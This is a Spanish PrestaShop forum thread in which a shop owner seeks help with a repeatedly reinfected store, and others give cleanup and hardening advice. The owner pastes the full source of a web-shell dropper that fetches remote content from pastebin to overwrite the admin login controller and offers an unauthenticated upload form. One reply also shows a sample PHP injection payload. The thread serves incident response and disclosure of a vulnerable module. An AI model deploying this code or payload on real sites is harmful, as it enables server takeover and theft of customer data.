hacked malware ( SOLUCIONADO )

[jonysi_d]

Hola, tengo un problema el cual me ha surgido al poco de cambiar de hosting.

 

Sucede que he encontrado varios archivos raros .php en mi hosting los cuales he ido aliminando. He cambiado todas las contraseñas de BBDD, FTP,BACK OFFICE, etc.. pero el problema es que curiosamente hay un archivo de Prestashop:

 

/controllers/admin/AdminLoginController.php

 

el cual se borra el contenido del archivo y no puedo acceder a mi back office. La solucion pasa por volver a subir el mismo archivo de Prestashop inicial y solucionado, pero el problema es que de vez en cuando se borra otra vez el contenido y ya me está dando miedo esto. 

Como informacion, no tengo modulos gratuitos instalados y mi version es la 1.6.1.10 y tengo antivirus de pago actualizado en mi pc ( McAfee ).

 

hay un archivo que también ( incluso despues de haberlo eliminado ) vuelve a aparecer en la raíz de la carpeta Modulos e incluso en la carpeta raiz de mi hosting. El archivo se llama up.php y el codigo es este:

<?php

echo "hacked by .......";

$sss=array('/','../','../../','../../../','../../../../','../../../../../');

foreach($sss as $pa){

$p1=array("$pa/controllers/admin/AdminLoginController.php","$pa/controllers/AdminLoginController.php");

foreach($p1 as $path){

if (file_exists("$path"))

{

$html = @file_get_contents('https://pastebin.com/raw/43Lwrz3d');

$save=fopen($path,'w');

fwrite($save,$html);

echo "<br> hous <br>";

[spam-filter]}

if($_GET['up']=="hous"){

echo '<center><font color="Red" size="4">';

/// Script Upload By amine \\\

if(isset($_POST['Submit'])){

	$filedir = ""; 

	$maxfile = '2000000';

	$mode = '0644';

	$userfile_name = $_FILES['image']['name'];

	$userfile_tmp = $_FILES['image']['tmp_name'];

	if(isset($_FILES['image']['name'])) {

		$qx = $filedir.$userfile_name;

		@move_uploaded_file($userfile_tmp, $qx);

		@chmod ($qx, octdec($mode));

echo" <a href=$userfile_name><center><b>Sucess Upload  ==> $userfile_name</b></center></a>";

}

}

else{

echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';

}

echo "<br> greerz all my friend<br>";

echo '</center></font>';

alguna idea de como solventarlo ???

 

 

gracias

Edited July 4, 2017 by jonysi_d (see edit history)

[Soy.es]

Lo que te esta pasando es que te están entrando hasta la cocina en tu web.

 

Seguramente tienes algún módulo vulnerable, habia un post fijo es este: https://www.prestashop.com/forums/topic/544579-major-security-issues-with-few-modules-and-themes/

 

Por mi parte revisaria estas 3 cosas-

 

-Módulo sent to friend si lo tienes desinstala y revisa que desaparezca del FTP.

-Módulo carritos abandonados sin actualizar. Lo mismo Elimina y si tienes la ultima versión lo pones.

-Theme Warehouse, si lo tienes debes actualizarlo en verano pasado salió una vulnerabilidad y caían como moscas el que no actualizase.

 

Tener un prestashop no es montarlo y olvidarse de el, hay que mantenerlo al día y estar pendiente de los fallos de seguridad y actualizaciones necesarias de aplicar.

 

Muchas veces nos vienen clientes con estas cosas y es mucho más complicado y caro limpiar, que hacer un buen mantenimiento preventivo.

 

Yo recomiendo siempre tener un servicio contratado con expertos, como nosotros o cualquiera de las otras agencias certificadas, pero no dejéis la tienda sin este tipo de cuidados y mantenimientos.

 

Si se vuelve a reproducir después de revisar lo que te he dicho y limpiarlo, ya lo están ejecutando desde dentro, lo tendrán escondido, hay que ir a buscarlo.

 

Saludos y suerte

PD: Esos que dicen que actualizando los módulos vale... Mucho cuidado eso no es suficiente.

[jonysi_d]

Gracias por tu respuesta:

estos modulos los he eliminado directamente del servidor.

Respecto al thema, no tengo instalado este tema. Tengo instalado uno de ThemeField de Themeforest. He leído en el post que me has proporcionado que tienen una serie de vulnerabilidades algunos modulos ( según Prestashop Team ) .

Me he puesto en contacto con el programador a ver que respuesta me da.

Os informaré por si sirve de ayuda a alguien aunque si hay alguna alternativa, soy todo oídos.

 

gracias

[Soy.es]

Ahor alo que tienes que hacer es revisar todo lo que tengas editado y nuevo de la fecha del hack a hoy, seguramente tengas un rootkit metido por algun sitio y hasta que no lo encuentres te estará dando.

 

Ya nos vas contando.

 

Si puedes edita el titulo para que no se llame como tu amigo, no sea que le entre la curiosidad por tu web y vea lo que has hecho, por lago del estilo prestashop hacked o algo así, pero no pongas su nombre por ningun lado para que no encuentre este post.

 

Saludos

[jonysi_d]

A quien le compré la plantilla me dice que en principio está solucionado el parche para el modulo o los modulos afectados por los cuales ( parece ser ) se colaban, pero ahora me surge otro problema: al intentar acceder a mi url:

http:/www.miweb.com 

la pagina aparece en blanco y activando el modo prueba de errores me aparecen estos errores:

 

Warning: Cannot modify header information - headers already sent by (output started at /home/miweb/public_html/index.php:7) in /home/miweb/public_html/classes/controller/FrontController.php on line 1000

Warning: Cannot modify header information - headers already sent by (output started at /home/miweb/public_html/index.php:7) in /home/miweb/public_html/classes/controller/FrontController.php on line 1001

 

 

pero si intento acceder mediante esta otra url:

http://www.miweb.com/es/

 

entonces aparecen estos otros errores:

 

Warning: Cannot modify header information - headers already sent by (output started at /home/miweb/public_html/index.php:7) in /home/miweb/public_html/classes/controller/FrontController.php on line 845

 

Warning: Cannot modify header information - headers already sent by (output started at /home/miweb/public_html/index.php:7) in /home/miweb/public_html/classes/controller/FrontController.php on line 846

 

Warning: Cannot modify header information - headers already sent by (output started at /home/miweb/public_html/index.php:7) in /home/miweb/public_html/classes/Tools.php on line 241

 

 

alguna idea de como solucionarlo este problema ??

 

gracias

Edited June 23, 2017 by jonysi_d (see edit history)

[Soy.es]

Que subas la actualización no garantiza que lo que tengas esta limpio, deberías revisar todos los ficheros del PrestaShop para ver por donde se ha metido y por donde te ha dejado regalitos, ficheros modificados, cosas parcheadas para sacar claves...

 

Te queda un largo trabajo de limpieza.

 

Saludos

[jonysi_d]

entonces es mejor reemplazar todo el PS ??, quizás actualizando la versión ?? imagino que reemplazará los archivos modificados , verdad ?? almenos una parte del problema podría solucionarse , aunque ya he leido por muchos sítios que antes de actualizar es mejor solucionar los problemas .

[Soy.es]

No solo habrá modificados, puede que tengas nuevos y que esos llamen a modificar los que hay (suelen hacer eso) actualizar ni loco, eso no suele solucionarlo.

 

Saludos

[OscarFreelance]

Hola chicos. 

 

Al parecer están infectando sitios con PS para aburrir... un cliente nuestro también ha sufrido un ataque de este tipo y como te dicen lo más seguro es que tengas algún rootkit instalado. 

 

Si te sirve de algo, sube los ficheros que tengas en local de tu tienda (deberías tener una copia si eres desarrollador antes de subir a producción), busca cualquier fichero que no aparezca en tu copia local. Cambia por prevención los siguientes passwords:

 

- Accesos FTP (Cambia nombre de cuenta de usuario y password), bbdd,... 

- Limita el acceso por SSH a tu servidor limitando a 1 ip la conexión (la tuya), si puedes deshabilita el acceso Root o agrégale más permisos restrictivos.

- Por supuesto, activa firewall si no lo tienes ya hecho y agrégale reglas restrictivas para el tráfico saliente

- Monitoriza todas las url's a las que se ha accedido desde el exterior y todo el tráfico saliente (es una locura pero te podrá dar alguna pista)

- Si utilizas caché para tu tienda, te recomiendo vaciarla por completo ya que puede haber código inyectado 

- Revisa todos los js de tu site (busca por base64, eval...) para garantizar que no hay nada inyectado en esos ficheros

- Revisa permisos de las carpetas de tu sitio, aunque si han conseguido acceso root es más que probable que no sirva de nada pero cuanto más vayas asegurando tu sitio para futuros ataques, mejor.

- Si utilizas Linux (CentOS, Debian,...),  hay una herramienta gratuita que se llama Rootkithunter que aunque a veces da falsos positivos te puede ir orientando un poco

- Revisa htaccess

- Monitoriza los procesos que tienes en ejecución en el servidor para ver si tienes alguno fuera de lo normal, mira incluso si hay algún proceso oculto ejecutándose

- Mete todas las actualizaciones de seguridad del sistema si es que no las tienes instaladas

- Revisa todos los módulos pues seguramente 1 o más de 1 tenga alguna brecha de seguridad bastante importante. Para que te hagas una idea, si algún módulo tiene algún campo de texto que es recogido en el post puedes inyectar código si el módulo está mal desarrollado. Para que te hagas una idea, supón que tienes un módulo con datos de entrada y a la hora de procesar los datos no se utiliza ningún método de seguridad para quitar html (o incluso para proteger los string que recoge utilizando para ello parámetros en la construcción), puedes meter en el campo -> "'*/ <?php código a ejecutar ?>" y a partir de ahí empezar a "jugar".

 

Pero sobre todo... paciencia y unas cuantas tazas de café, es muy puñetero. 

 

Si lo tienes en producción, te aconsejaría que te bajaras una copia del sitio entero + la base de datos y lo ejecutes en una máquina virtual con el mismo sistema que en producción para poder realizar un análisis más exhaustivo y saber por donde cogerlo. Además esto te servirá para comparar tanto estructura del sitio como ficheros que no estén para así ir acotando la búsqueda de esos ficheros "extra".

 

Como te dicen, no actualices, puede ser peor el remedio que la enfermedad... Y, sobre todo, en paralelo intenta detectar cuál es el proceso que corre en tu servidor mediante el cuál se autoejecuta aunque borres todos los ficheros infectados del site. Mira también si hay algún cron configurado en tu servidor tanto visible como oculto por si también te está entrando otra vez por ahí... 

 

Espero haber podido ayudarte aunque sea un poco. 

 

Ánimo!

[jonysi_d]

Hola,

parece que lo tengo ya solucionado. Os cuento por si a alguien le sirve de ayuda a tratar de pasar lo mejor posible este mal trago...!!

 

PRIMERO:

Recomiendo mirar muy bien por todos los directorios de PS por si ves algun archibo sospechoso. A mi se me colaban por todos lados: en la raíz, en los modulos, en admin, etc...

elimina todo lo que veas sospechoso, pero con cuidado no elimines alguno de origen de PS. Estos archivos lo que hacen es:

hacen sitemaps a su manera con páginas que acaban siempre en error 404, generan paginas que redirije al cliente a paginas ficticias de pago para quedarse con los datos y el dinero, ademas de controlar el bak office ( almenos esto es lo que he detectado que han intentado hacer sin exito en algunas cosas ).También llegan a redirijir todas las url a paginas chinas.

 

Las medidas que he tomado an sido:

 

cambian a navegación por https

cambiar contraseñas de acceso al BO,FTP y BBDD

eliminar los archivos infectados y las carpetas creadas. He tenido que substituir algunos archivos de origen de PS porque me borraban los códigos.

Importante y quizás lo más importante es detectar de donde viene el problema. El problema he detectado que viene de un modulo que se instaló al comprar una plantilla en Themeforest. Me puse en contacto con el programador de la plantilla y tan solo se dignó a poner un parche ( según el ) al modulo infectado. Pero después de unos días el problema persistía.

Lo que hice fue borrar este modulo de mi servidor.

El modulo es " fieldvmegamenu ", así que si lo tienes instalado....ojo..!!!!

También he actualizado el Prestashop a la última versión por temas de mejora de seguridad

 

Tengo que agradecer también a Javier Valero que me ha ayudado en el trabajo, es con quien tengo el hosting. Os lo recomiendo..!!

 

Llevo ya una semana si ( al parecer ) problemas, espero que todo siga así.

 

Espero que almenos sirva de ayuda si alguien se encuentra en la misma situación.

 

gracias 

[NetVicious]

El problema exacto es del módulo fieldvmegamenu que como bien dices suelen utilizar en ThemeForest para muchos de sus temas.

 

El problema estaba en que el fichero modules/fieldvmegamenu/ajax/upload.php no controla que la llamada sea del administrador del sitio y por lo tanto permite subir cualquier fichero que el atacante guste.

 

Estoy a la espera que me pasen el modulo actualizado, pero por ahora he modificado el susodicho fichero para que no puedan subir nada más.

[borlam]

Si deseas presupuesto económico para revisar y eliminar alguna de estas brechas de seguridad pueden contactarme. He tenido algún caso de éxito en los que ha sido eliminado el virus que presentaba un formulario falso para robar las tarjetas de crédito a los clientes de la web y las enviaba a IPs localizadas en China. Cuando pueda daré más información acerca de toda la infección y como eliminarla.

Gracias y un saludo